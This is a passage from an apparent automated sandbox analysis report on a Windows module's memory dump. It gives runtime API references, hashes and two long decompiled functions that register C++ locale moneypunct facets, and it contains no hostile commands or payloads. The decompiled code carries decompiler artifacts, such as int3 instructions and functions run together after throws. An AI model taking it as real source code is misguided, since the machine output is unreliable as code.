std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB9F5
int.LIBCPMT ref: 6E1DBA0C

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1DBA2F
std::_Facet_Register.LIBCPMT ref: 6E1DBA46
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DBA66
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DBA84

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 492d90ec6df0424c227f127d50dbce85702566892ffe3cf8a32347def537c2f9
Instruction ID: f6341a073776d5cda293499c847775b3163cf861162d397071e0a35119c0ee1c
Opcode Fuzzy Hash: 492d90ec6df0424c227f127d50dbce85702566892ffe3cf8a32347def537c2f9
Instruction Fuzzy Hash: 24115CB591052DCBCF01DBD4C884FFEB37AAF55704F140908E411AB290CF749A89E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF60D, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF60D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t167;
				signed int _t168;
				void* _t180;
				void* _t193;
				void* _t206;
				void* _t219;
				void* _t232;
				void* _t245;
				void* _t258;
				void* _t271;
				void* _t284;
				void* _t297;
				signed int _t435;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				void* _t506;

				_t469 = __edx;
				_t358 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t506 - 0x14, 0);
				_t483 =  *0x6e286df4;
				 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
				 *(_t506 - 0x10) = _t483;
				_t167 = E6E1A161C(0x6e286da0);
				_t361 =  *((intOrPtr*)(_t506 + 8));
				_t168 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t167);
				_t471 = _t168;
				if(_t168 != 0) {
					L5:
					E6E1C66BA(_t506 - 0x14);
					return E6E1E0075(_t471);
				} else {
					if(_t483 == 0) {
						_push( *((intOrPtr*)(_t506 + 8)));
						_push(_t506 - 0x10);
						__eflags = E6E1D11AB(__ebx, _t361, __edx, _t471, _t483) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t506 - 0x20);
							E6E1E3D74(_t506 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t471, _t483, 0x14);
							E6E1C6653(_t506 - 0x14, 0);
							_t484 =  *0x6e286dc8;
							 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
							 *(_t506 - 0x10) = _t484;
							_t180 = E6E1A161C(0x6e286d7c);
							_t368 =  *((intOrPtr*)(_t506 + 8));
							_t472 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t180);
							__eflags = _t472;
							if(_t472 != 0) {
								L12:
								E6E1C66BA(_t506 - 0x14);
								return E6E1E0075(_t472);
							} else {
								__eflags = _t484;
								if(_t484 == 0) {
									_push( *((intOrPtr*)(_t506 + 8)));
									_push(_t506 - 0x10);
									__eflags = E6E1D1230(_t358, _t368, __edx, _t472, _t484) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t506 - 0x20);
										E6E1E3D74(_t506 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t358, _t472, _t484, 0x14);
										E6E1C6653(_t506 - 0x14, 0);
										_t485 =  *0x6e286dc4;
										 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
										 *(_t506 - 0x10) = _t485;
										_t193 = E6E1A161C(0x6e286d78);
										_t375 =  *((intOrPtr*)(_t506 + 8));
										_t473 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t193);
										__eflags = _t473;
										if(_t473 != 0) {
											L19:
											E6E1C66BA(_t506 - 0x14);
											return E6E1E0075(_t473);
										} else {
											__eflags = _t485;
											if(_t485 == 0) {
												_push( *((intOrPtr*)(_t506 + 8)));
												_push(_t506 - 0x10);
												__eflags = E6E1D12B4(_t358, _t375, __edx, _t473, _t485) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t506 - 0x20);
													E6E1E3D74(_t506 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t358, _t473, _t485, 0x14);
													E6E1C6653(_t506 - 0x14, 0);
													_t486 =  *0x6e286dd8;
													 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
													 *(_t506 - 0x10) = _t486;
													_t206 = E6E1A161C(0x6e286d84);
													_t382 =  *((intOrPtr*)(_t506 + 8));
													_t474 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t206);
													__eflags = _t474;
													if(_t474 != 0) {
														L26:
														E6E1C66BA(_t506 - 0x14);
														return E6E1E0075(_t474);
													} else {
														__eflags = _t486;
														if(_t486 == 0) {
															_push( *((intOrPtr*)(_t506 + 8)));
															_push(_t506 - 0x10);
															__eflags = E6E1D1339(_t358, _t382, _t469, _t474, _t486) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t506 - 0x20);
																E6E1E3D74(_t506 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t358, _t474, _t486, 0x14);
																E6E1C6653(_t506 - 0x14, 0);
																_t487 =  *0x6e286db0;
																 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																 *(_t506 - 0x10) = _t487;
																_t219 = E6E1A161C(0x6e286d64);
																_t389 =  *((intOrPtr*)(_t506 + 8));
																_t475 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t219);
																__eflags = _t475;
																if(_t475 != 0) {
																	L33:
																	E6E1C66BA(_t506 - 0x14);
																	return E6E1E0075(_t475);
																} else {
																	__eflags = _t487;
																	if(_t487 == 0) {
																		_push( *((intOrPtr*)(_t506 + 8)));
																		_push(_t506 - 0x10);
																		__eflags = E6E1D13A1(_t358, _t389, _t469, _t475, _t487) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t506 - 0x20);
																			E6E1E3D74(_t506 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t358, _t475, _t487, 0x14);
																			E6E1C6653(_t506 - 0x14, 0);
																			_t488 =  *0x6e286ddc;
																			 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																			 *(_t506 - 0x10) = _t488;
																			_t232 = E6E1A161C(0x6e286d88);
																			_t396 =  *((intOrPtr*)(_t506 + 8));
																			_t476 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t232);
																			__eflags = _t476;
																			if(_t476 != 0) {
																				L40:
																				E6E1C66BA(_t506 - 0x14);
																				return E6E1E0075(_t476);
																			} else {
																				__eflags = _t488;
																				if(_t488 == 0) {
																					_push( *((intOrPtr*)(_t506 + 8)));
																					_push(_t506 - 0x10);
																					__eflags = E6E1D1409(_t358, _t396, _t469, _t476, _t488) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t506 - 0x20);
																						E6E1E3D74(_t506 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t358, _t476, _t488, 0x14);
																						E6E1C6653(_t506 - 0x14, 0);
																						_t489 =  *0x6e286de0;
																						 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																						 *(_t506 - 0x10) = _t489;
																						_t245 = E6E1A161C(0x6e286d8c);
																						_t403 =  *((intOrPtr*)(_t506 + 8));
																						_t477 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t245);
																						__eflags = _t477;
																						if(_t477 != 0) {
																							L47:
																							E6E1C66BA(_t506 - 0x14);
																							return E6E1E0075(_t477);
																						} else {
																							__eflags = _t489;
																							if(_t489 == 0) {
																								_push( *((intOrPtr*)(_t506 + 8)));
																								_push(_t506 - 0x10);
																								__eflags = E6E1D1471(_t358, _t403, _t469, _t477, _t489) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t506 - 0x20);
																									E6E1E3D74(_t506 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t358, _t477, _t489, 0x14);
																									E6E1C6653(_t506 - 0x14, 0);
																									_t490 =  *0x6e286dfc;
																									 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																									 *(_t506 - 0x10) = _t490;
																									_t258 = E6E1A161C(0x6e286da8);
																									_t410 =  *((intOrPtr*)(_t506 + 8));
																									_t478 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t258);
																									__eflags = _t478;
																									if(_t478 != 0) {
																										L54:
																										E6E1C66BA(_t506 - 0x14);
																										return E6E1E0075(_t478);
																									} else {
																										__eflags = _t490;
																										if(_t490 == 0) {
																											_push( *((intOrPtr*)(_t506 + 8)));
																											_push(_t506 - 0x10);
																											__eflags = E6E1D14EC(_t358, _t410, _t469, _t478, _t490) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t506 - 0x20);
																												E6E1E3D74(_t506 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t358, _t478, _t490, 0x14);
																												E6E1C6653(_t506 - 0x14, 0);
																												_t491 =  *0x6e286dcc;
																												 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																												 *(_t506 - 0x10) = _t491;
																												_t271 = E6E1A161C(0x6e286d80);
																												_t417 =  *((intOrPtr*)(_t506 + 8));
																												_t479 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t271);
																												__eflags = _t479;
																												if(_t479 != 0) {
																													L61:
																													E6E1C66BA(_t506 - 0x14);
																													return E6E1E0075(_t479);
																												} else {
																													__eflags = _t491;
																													if(_t491 == 0) {
																														_push( *((intOrPtr*)(_t506 + 8)));
																														_push(_t506 - 0x10);
																														__eflags = E6E1D1558(_t358, _t417, _t469, _t479, _t491) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t506 - 0x20);
																															E6E1E3D74(_t506 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t358, _t479, _t491, 0x14);
																															E6E1C6653(_t506 - 0x14, 0);
																															_t492 =  *0x6e286e00;
																															 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																															 *(_t506 - 0x10) = _t492;
																															_t284 = E6E1A161C(0x6e286dac);
																															_t424 =  *((intOrPtr*)(_t506 + 8));
																															_t480 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t284);
																															__eflags = _t480;
																															if(_t480 != 0) {
																																L68:
																																E6E1C66BA(_t506 - 0x14);
																																return E6E1E0075(_t480);
																															} else {
																																__eflags = _t492;
																																if(_t492 == 0) {
																																	_push( *((intOrPtr*)(_t506 + 8)));
																																	_push(_t506 - 0x10);
																																	__eflags = E6E1D15C4(_t358, _t424, _t469, _t480, _t492) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t506 - 0x20);
																																		E6E1E3D74(_t506 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t358, _t480, _t492, 0x14);
																																		E6E1C6653(_t506 - 0x14, 0);
																																		_t493 =  *0x6e286dd0;
																																		 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																																		 *(_t506 - 0x10) = _t493;
																																		_t297 = E6E1A161C(0x6e286d60);
																																		_t431 =  *((intOrPtr*)(_t506 + 8));
																																		_t481 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t297);
																																		__eflags = _t481;
																																		if(_t481 != 0) {
																																			L75:
																																			E6E1C66BA(_t506 - 0x14);
																																			return E6E1E0075(_t481);
																																		} else {
																																			__eflags = _t493;
																																			if(_t493 == 0) {
																																				_push( *((intOrPtr*)(_t506 + 8)));
																																				_push(_t506 - 0x10);
																																				__eflags = E6E1D162A(_t358, _t431, _t469, _t481, _t493) - 0xffffffff;
																																				if(__eflags == 0) {
																																					_t435 = _t506 - 0x20;
																																					E6E1A1438(_t435);
																																					E6E1E3D74(_t506 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e22851f, _t358, _t481, _t493, 4);
																																					_t494 = _t435;
																																					 *(_t506 - 0x10) = _t494;
																																					 *((intOrPtr*)(_t494 + 4)) =  *((intOrPtr*)(_t506 + 0xc));
																																					_push( *((intOrPtr*)(_t506 + 0x14)));
																																					_t161 = _t506 - 4;
																																					 *_t161 =  *(_t506 - 4) & 0x00000000;
																																					__eflags =  *_t161;
																																					 *_t494 = 0x6e22c0c4;
																																					 *((char*)(_t494 + 0x28)) =  *((intOrPtr*)(_t506 + 0x10));
																																					E6E1D542F(_t358, _t435, _t469, _t481, _t494,  *_t161);
																																					return E6E1E0075(_t494,  *((intOrPtr*)(_t506 + 8)));
																																				} else {
																																					_t481 =  *(_t506 - 0x10);
																																					 *(_t506 - 0x10) = _t481;
																																					 *(_t506 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t481);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t481 + 4))))();
																																					 *0x6e286dd0 = _t481;
																																					goto L75;
																																				}
																																			} else {
																																				_t481 = _t493;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t480 =  *(_t506 - 0x10);
																																		 *(_t506 - 0x10) = _t480;
																																		 *(_t506 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t480);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t480 + 4))))();
																																		 *0x6e286e00 = _t480;
																																		goto L68;
																																	}
																																} else {
																																	_t480 = _t492;
																																	goto L68;
																																}
																															}
																														} else {
																															_t479 =  *(_t506 - 0x10);
																															 *(_t506 - 0x10) = _t479;
																															 *(_t506 - 4) = 1;
																															E6E1C6FD3(__eflags, _t479);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t479 + 4))))();
																															 *0x6e286dcc = _t479;
																															goto L61;
																														}
																													} else {
																														_t479 = _t491;
																														goto L61;
																													}
																												}
																											} else {
																												_t478 =  *(_t506 - 0x10);
																												 *(_t506 - 0x10) = _t478;
																												 *(_t506 - 4) = 1;
																												E6E1C6FD3(__eflags, _t478);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t478 + 4))))();
																												 *0x6e286dfc = _t478;
																												goto L54;
																											}
																										} else {
																											_t478 = _t490;
																											goto L54;
																										}
																									}
																								} else {
																									_t477 =  *(_t506 - 0x10);
																									 *(_t506 - 0x10) = _t477;
																									 *(_t506 - 4) = 1;
																									E6E1C6FD3(__eflags, _t477);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t477 + 4))))();
																									 *0x6e286de0 = _t477;
																									goto L47;
																								}
																							} else {
																								_t477 = _t489;
																								goto L47;
																							}
																						}
																					} else {
																						_t476 =  *(_t506 - 0x10);
																						 *(_t506 - 0x10) = _t476;
																						 *(_t506 - 4) = 1;
																						E6E1C6FD3(__eflags, _t476);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 4))))();
																						 *0x6e286ddc = _t476;
																						goto L40;
																					}
																				} else {
																					_t476 = _t488;
																					goto L40;
																				}
																			}
																		} else {
																			_t475 =  *(_t506 - 0x10);
																			 *(_t506 - 0x10) = _t475;
																			 *(_t506 - 4) = 1;
																			E6E1C6FD3(__eflags, _t475);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t475 + 4))))();
																			 *0x6e286db0 = _t475;
																			goto L33;
																		}
																	} else {
																		_t475 = _t487;
																		goto L33;
																	}
																}
															} else {
																_t474 =  *(_t506 - 0x10);
																 *(_t506 - 0x10) = _t474;
																 *(_t506 - 4) = 1;
																E6E1C6FD3(__eflags, _t474);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t474 + 4))))();
																 *0x6e286dd8 = _t474;
																goto L26;
															}
														} else {
															_t474 = _t486;
															goto L26;
														}
													}
												} else {
													_t473 =  *(_t506 - 0x10);
													 *(_t506 - 0x10) = _t473;
													 *(_t506 - 4) = 1;
													E6E1C6FD3(__eflags, _t473);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t473 + 4))))();
													 *0x6e286dc4 = _t473;
													goto L19;
												}
											} else {
												_t473 = _t485;
												goto L19;
											}
										}
									} else {
										_t472 =  *(_t506 - 0x10);
										 *(_t506 - 0x10) = _t472;
										 *(_t506 - 4) = 1;
										E6E1C6FD3(__eflags, _t472);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t472 + 4))))();
										 *0x6e286dc8 = _t472;
										goto L12;
									}
								} else {
									_t472 = _t484;
									goto L12;
								}
							}
						} else {
							_t471 =  *(_t506 - 0x10);
							 *(_t506 - 0x10) = _t471;
							 *(_t506 - 4) = 1;
							E6E1C6FD3(__eflags, _t471);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 4))))();
							 *0x6e286df4 = _t471;
							goto L5;
						}
					} else {
						_t471 = _t483;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF614
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF61E
int.LIBCPMT ref: 6E1CF635

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1CF658
std::_Facet_Register.LIBCPMT ref: 6E1CF66F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF68F
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF6AD

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 53b390ba03fd974fe37101498435c3491548a95a4e30e7187873ea2a242c102c
Instruction ID: 0ba74a86facee1b64f7d6815e1ecc4955b8caf8c0b0232535b29cf9f0bdeb863
Opcode Fuzzy Hash: 53b390ba03fd974fe37101498435c3491548a95a4e30e7187873ea2a242c102c
Instruction Fuzzy Hash: F1115CB59105298FCF01DBE4C854AFEB7BAAF68B14F240808D430F7290CF789985E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB74C, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1DB74C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t374 - 0x14, 0);
				_t357 =  *0x6e286e28;
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6E1A161C(0x6e286e08);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6E1C66BA(_t374 - 0x14);
					return E6E1E0075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6E1DBF46(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t374 - 0x20);
							E6E1E3D74(_t374 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t348, _t357, 0x14);
							E6E1C6653(_t374 - 0x14, 0);
							_t358 =  *0x6e286e2c;
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6E1A161C(0x6e286e0c);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6E1C66BA(_t374 - 0x14);
								return E6E1E0075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6E1DBFE8(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t374 - 0x20);
										E6E1E3D74(_t374 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t265, _t349, _t358, 0x14);
										E6E1C6653(_t374 - 0x14, 0);
										_t359 =  *0x6e286e30;
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6E1A161C(0x6e286e10);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6E1C66BA(_t374 - 0x14);
											return E6E1E0075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6E1DC050(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t374 - 0x20);
													E6E1E3D74(_t374 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t265, _t350, _t359, 0x14);
													E6E1C6653(_t374 - 0x14, 0);
													_t360 =  *0x6e286e34;
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6E1A161C(0x6e286e14);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6E1C66BA(_t374 - 0x14);
														return E6E1E0075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6E1DC0B8(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t374 - 0x20);
																E6E1E3D74(_t374 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t265, _t351, _t360, 0x14);
																E6E1C6653(_t374 - 0x14, 0);
																_t361 =  *0x6e286e3c;
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6E1A161C(0x6e286e1c);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6E1C66BA(_t374 - 0x14);
																	return E6E1E0075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6E1DC120(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t374 - 0x20);
																			E6E1E3D74(_t374 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t265, _t352, _t361, 0x14);
																			E6E1C6653(_t374 - 0x14, 0);
																			_t362 =  *0x6e286e38;
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6E1A161C(0x6e286e18);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6E1C66BA(_t374 - 0x14);
																				return E6E1E0075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6E1DC1A4(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t374 - 0x20);
																						E6E1E3D74(_t374 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t265, _t353, _t362, 0x14);
																						E6E1C6653(_t374 - 0x14, 0);
																						_t363 =  *0x6e286e40;
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6E1A161C(0x6e286e20);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6E1C66BA(_t374 - 0x14);
																							return E6E1E0075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6E1DC229(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t374 - 0x20);
																									E6E1E3D74(_t374 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t265, _t354, _t363, 0x14);
																									E6E1C6653(_t374 - 0x14, 0);
																									_t364 =  *0x6e286e44;
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6E1A161C(0x6e286e24);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6E1C66BA(_t374 - 0x14);
																										return E6E1E0075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6E1DC295(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6E1A1438(_t321);
																												E6E1E3D74(_t374 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e22851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6e22c414;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6E1DD028(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6E1E0075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6E1C6FD3(__eflags, _t355);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6e286e44 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6E1C6FD3(__eflags, _t354);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6e286e40 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6E1C6FD3(__eflags, _t353);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6e286e38 = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
